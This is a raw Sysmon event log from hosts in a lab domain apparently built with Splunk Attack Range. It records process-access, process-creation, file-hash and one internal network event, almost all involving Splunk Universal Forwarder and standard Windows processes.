07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.239{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.220{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21BB72E721255AE59A357E393D89760,SHA256=BEE5F25FA36A4A4FEE1A36B81892DB55B026A6696505EA1EEC6E478206AB9A1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:51.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F218963AB945458A476215D54E8760E2,SHA256=44E20F554DCA50AC5D8E3D7F0B0AFEE480576899A1F4A178BDABA0490B64D5CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.824{466BC892-F4D3-60EB-3B7D-00000000CF01}97329636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.608{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.593{466BC892-F4D3-60EB-3B7D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:51.222{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E22B53E6B329AC383EA127CDABCBF71A,SHA256=9DBA31FEDB2B207937131644687BEE044B7014CF546A685E51346981058E150E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.222{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B68AA1E2EF1D1A8C16B475DA0E70F10,SHA256=67F9013B489E7AD95305042ECC1D3C8A8BFFF02A94047AE0CFA675383DBB0051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:51.122{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E463D6417AC5A85C855CA57A74ECD44,SHA256=799B113E8903A63F23944D77AEA267D394BD2D04ABCD3A1DC54CD6711AA87383,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:50.217{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57271-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:52.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39A60940798E08393A042DF4F10A39E7,SHA256=D60E69ABAC3DDDF1A2F9F3A507B3DD8EBE8DF93D6361F95F3060980C4B9EC0D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.992{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.976{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:52.976{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.976{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.976{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.977{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.593{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E22B53E6B329AC383EA127CDABCBF71A,SHA256=9DBA31FEDB2B207937131644687BEE044B7014CF546A685E51346981058E150E,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001049045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.508{466BC892-F4D4-60EB-3C7D-00000000CF01}895210204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.293{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:52.293{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 